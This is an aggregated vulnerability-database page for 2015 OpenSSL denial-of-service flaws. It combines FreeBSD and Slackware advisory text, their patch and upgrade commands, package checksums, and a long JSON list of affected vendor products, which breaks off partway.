For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit .

I. Background

FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.

Abstract Syntax Notation One (ASN.1) is a standard and notation that describes rules and structures for representing, encoding, transmitting, and decoding data in telecommunications and computer networking, which enables representation of objects that are independent of machine-specific encoding technique.

II. [CVE-2015-0293]

III. [CVE-2015-0209]

A remote attacker who is able to send specifically crafted certificates may be able to crash an OpenSSL client or server. [CVE-2015-0287]

An attacker may be able to crash applications that create a new certificate request with subject name the same as in an existing, specifically crafted certificate.

IV. Workaround

No workaround is available.

V. Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

freebsd-update fetch

freebsd-update install

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 8.4 and FreeBSD 9.3]

fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-0.9.8.patch

fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-0.9.8.patch.asc

gpg --verify openssl-0.9.8.patch.asc

[FreeBSD 10.1]

fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-1.0.1.patch

fetch https://security.FreeBSD.org/patches/SA-15:06/openssl-1.0.1.patch.asc

gpg --verify openssl-1.0.1.patch.asc

b) Apply the patch. Execute the following commands as root:

cd /usr/src

patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as described in .

Restart all deamons using the library, or reboot the system.

VI. Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path Revision

stable/8/ r280266 releng/8.4/ r280268 stable/9/ r280266 releng/9.3/ r280268 stable/10/ r280266 releng/10.1/ r280268

To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:

svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NNNNNN with the revision number:

VII. References

The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.1.2 (FreeBSD)

iQIcBAEBCgAGBQJVCwr1AAoJEO1n7NZdz2rnayEP/0w3Pba5k/1G0mJ1T9APNAns hhXm0YuR/rNJ1XBooWEOctrijlsVChcIt8KvJCU9apOZWjDvm/nvaQ077GCi5RSp jhQBs8MLVfXzwMbJ0/uBpp6ChF8uafk5O+gr8ulb2jG6VIaLkGOWPYv61aRYSGxy R7+6FxD8M0lLbGOQGETy1HxKzeWztA2p0ILORNAsi+bF8GSJpxGhSxqDDi4+ic/C 3oEw0zT/E6DhxJovOPebKq0eGcRbv7ETqDmtNQdqbOddV+0FY1E+nHtrAo6B/Kln rL+meBJHmLeEREROFk4OvCynuROUJGmXJGKwjN3uOVM05qcEZS4NkVhFNrxt6S5H t3wQ02SesbA3pbmce5OuXmlJgdL57DVlMb5sQjkqPeoJ6pn6Rz7VLSgLNfXDUSxs x/Lgx0+qLQUubMud7zT97UIvZmDqFTWXfJu5S/0Qt8BPFunmoNJttJ5Cr+brzEtu 5RLjcvkC1giVCpSXS96QbeT67uqSkMZa8gtII8bA77HBGA0Ky8AOwTAXbCiUovuH sLwsI8KUC3lsKUh7eyLsSm2+wRHn0e6dZ1PE0JRazCnCRboTvMWK2d4R7ANdrwsq CgtCWLRz6vbB9J4XTNupcEoZGhIA4RuOBqx43eQmaRw1HoV3vn85QP94oL5jzXBd UQg3YfrXHDlxCsqEzN7o =wi0T -----END PGP SIGNATURE----- .

Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1m-i486-1_slack14.1.txz: Upgraded.

Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zf-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.0.txz

Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz

Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zf-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.1.txz

Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz

Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zf-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zf-i486-1_slack13.37.txz

Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zf-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz

Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1m-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.0.txz

Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1m-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz

Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1m-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1m-i486-1_slack14.1.txz

Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1m-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz

Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1m-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1m-i486-1.txz

Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1m-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1m-x86_64-1.txz

MD5 signatures: +-------------+

Slackware 13.0 packages: 9ba57b2971962ceb6205ec7b7e6b84e7 openssl-0.9.8zf-i486-1_slack13.0.txz 706ef57bb71992961584a3d957c5dbcb openssl-solibs-0.9.8zf-i486-1_slack13.0.txz

Slackware x86_64 13.0 packages: 5f581b663798eacc8e7df4c292f33dbf openssl-0.9.8zf-x86_64-1_slack13.0.txz fe5f33f4d2db08b4f8d724e62bf6e514 openssl-solibs-0.9.8zf-x86_64-1_slack13.0.txz

Slackware 13.1 packages: 1ef0ba15454da786993361c927084438 openssl-0.9.8zf-i486-1_slack13.1.txz 2b3e20bcaa77f39512b6edcbc41b5471 openssl-solibs-0.9.8zf-i486-1_slack13.1.txz

Slackware x86_64 13.1 packages: f8fae10a1936cf900d362b65d9b2c8df openssl-0.9.8zf-x86_64-1_slack13.1.txz 0093e35c46382eeef03a51421895ed65 openssl-solibs-0.9.8zf-x86_64-1_slack13.1.txz

Slackware 13.37 packages: 7d4dd0f76252c98622a5f5939f6f0674 openssl-0.9.8zf-i486-1_slack13.37.txz e5cde01c0773ac78d33964e4107878df openssl-solibs-0.9.8zf-i486-1_slack13.37.txz

Slackware x86_64 13.37 packages: 379424e15bd378e00a5ba0c709432429 openssl-0.9.8zf-x86_64-1_slack13.37.txz 54832ad7e5440ce1c496be47fec9140d openssl-solibs-0.9.8zf-x86_64-1_slack13.37.txz

Slackware 14.0 packages: 8abafa33d2bf90b6cd8be849c0d9a643 openssl-1.0.1m-i486-1_slack14.0.txz bac56213a540586d801d7b57608396de openssl-solibs-1.0.1m-i486-1_slack14.0.txz

Slackware x86_64 14.0 packages: b4c6c971e74b678c68671feed18fa7dc openssl-1.0.1m-x86_64-1_slack14.0.txz acac871e22b5de998544c2f6431c0139 openssl-solibs-1.0.1m-x86_64-1_slack14.0.txz

Slackware 14.1 packages: c1f47f1f1ba5a13d6ac2ef2ae48bfb4c openssl-1.0.1m-i486-1_slack14.1.txz b7b1761ae1585f406d303273812043d3 openssl-solibs-1.0.1m-i486-1_slack14.1.txz

Slackware x86_64 14.1 packages: 1c6e11e2e3454836d5a3e9243f7c7738 openssl-1.0.1m-x86_64-1_slack14.1.txz 25b7a704816a2123463ddbfabbc1b86d openssl-solibs-1.0.1m-x86_64-1_slack14.1.txz

Slackware -current packages: 0926b2429e1326c8ab9bcbbda056dc66 a/openssl-solibs-1.0.1m-i486-1.txz b6252d0f141eba7b0a8e8c5bbdc314f0 n/openssl-1.0.1m-i486-1.txz

Slackware x86_64 -current packages: 99b903f556c7a2d5ec283f04c2f5a650 a/openssl-solibs-1.0.1m-x86_64-1.txz 9ecb47e0b70bd7f8064c96fb2211c4b7 n/openssl-1.0.1m-x86_64-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg openssl-1.0.1m-i486-1_slack14.1.txz openssl-solibs-1.0.1m-i486-1_slack14.1.txz

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0052",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0m"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0n"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0o"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1k"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1g"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0j"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0g"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0p"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0q"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1e"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1a"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1j"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1f"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0f"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0e"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0i"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1d"
      },
      {
        "model": "openssl",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "0.9.8ze"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1i"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0k"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "0.9.8 thats all  0.9.8zf"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.0 thats all  1.0.0r"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1 thats all  1.0.1m"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2 thats all  1.0.2a"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.10 to  10.10.3"
      },
      {
        "model": "enterprise manager",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "ops center 12.1.4"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "ops center 12.2.0"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "ops center 12.2.1"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "ops center 12.3.0"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle business intelligence enterprise edition 11.1.1.7"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle business intelligence enterprise edition 11.1.1.9"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle endeca server 7.3.0.0"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle endeca server 7.4.0.0"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle endeca server 7.5.1.1"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle endeca server 7.6.1.0.0"
      },
      {
        "model": "fusion middleware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle exalogic infrastructure 2.0.6.2"
      },
      {
        "model": "hp icewall mcrp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "2.1"
      },
      {
        "model": "hp icewall mcrp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "2.1 sp1"
      },
      {
        "model": "hp icewall mcrp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "2.1 sp2"
      },
      {
        "model": "hp icewall mcrp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "3.0"
      },
      {
        "model": "hp icewall sso",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "agent 8.0"
      },
      {
        "model": "hp icewall sso",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "agent 8.0 2007 update release 2"
      },
      {
        "model": "hp icewall sso",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "dfw 10.0"
      },
      {
        "model": "hp icewall sso",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "dfw 8.0"
      },
      {
        "model": "hp icewall sso",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "dfw 8.0 r1"
      },
      {
        "model": "hp icewall sso",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "dfw 8.0 r2"
      },
      {
        "model": "hp icewall sso",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "dfw 8.0 r3"
      },
      {
        "model": "csview",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/web questionnaire"
      },
      {
        "model": "enterprisedirectoryserver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver8.0"
      },
      {
        "model": "enterpriseidentitymanager",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver2.0 to  8.0"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  intersecvm/sg v1.2"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.0"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v3.1"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v4.0"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  sg3600lm/lg/lj v6.1"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v6.2"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v7.0"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v7.1"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.0"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sg series  univerge sg3000lg/lj"
      },
      {
        "model": "express5800",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "/sigmablade em card (n8405-019/019a/043) firmware  rev.14.02 before"
      },
      {
        "model": "istorage",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "hs series"
      },
      {
        "model": "istorage",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "nv7400/nv5400/nv3400 series"
      },
      {
        "model": "istorage",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "nv7500/nv5500/nv3500 series"
      },
      {
        "model": "ix2000 series",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver.8.7.22 all subsequent"
      },
      {
        "model": "ix3000 series",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver.8.7.22 all subsequent"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.0"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.01"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.02"
      },
      {
        "model": "secureware/pki application development kit",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "ver3.1"
      },
      {
        "model": "systemdirector enterprise",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "for java ( all models ) v5.1 to  v7.2"
      },
      {
        "model": "univerge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "3c cmm"
      },
      {
        "model": "univerge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "3c ucm v8.5.4 before"
      },
      {
        "model": "webotx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "enterprise edition v4.2 to  v6.5"
      },
      {
        "model": "webotx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "standard edition v4.2 to  v6.5"
      },
      {
        "model": "webotx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "standard-j edition v4.1 to  v6.5"
      },
      {
        "model": "webotx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "uddi registry v1.1 to  v7.1"
      },
      {
        "model": "webotx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "web edition v4.1 to  v6.5"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "enterprise edition v7.1"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "enterprise v8.2 to  v9.2"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "express v8.2 to  v9.2"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "foundation v8.2 to  v8.5"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "standard edition v7.1"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "standard v8.2 to  v9.2"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "standard-j edition v7.1 to  v8.1"
      },
      {
        "model": "webotx application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "web edition v7.1 to  v8.1"
      },
      {
        "model": "webotx enterprise service bus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v6.4 to  v9.2"
      },
      {
        "model": "webotx portal",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "v8.2 to  v9.1"
      },
      {
        "model": "webotx sip application server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "standard edition v7.1 to  v8.1"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "application navigator agent ver3.3 to  ver4.1"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "application navigator manager ver3.2.2 to  ver4.1"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "application navigator probe option ver3.1.0.x to  ver4.1.0.x"
      },
      {
        "model": "websam",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "nec",
        "version": "jobcenter r14.1"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.6,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "big-ip apm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "hp-ux b.11.23 (11i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "v2)"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.1"
      },
      {
        "model": "aura collaboration environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "informix genero",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.32"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3.1"
      },
      {
        "model": "bladecenter advanced management module 25r5778",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "security network controller 1.0.3361m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1.10.186"
      },
      {
        "model": "algo one ase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.7"
      },
      {
        "model": "bladecenter -s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1948"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.2.6"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0"
      },
      {
        "model": "icewall mcrp sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1"
      },
      {
        "model": "smartcloud entry fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.211"
      },
      {
        "model": "pureapplication system interim fix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.0.1"
      },
      {
        "model": "sbr carrier",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "i operating system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "rational clearcase",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.12"
      },
      {
        "model": "algo one core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.7"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "tivoli netcool system service monitor fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
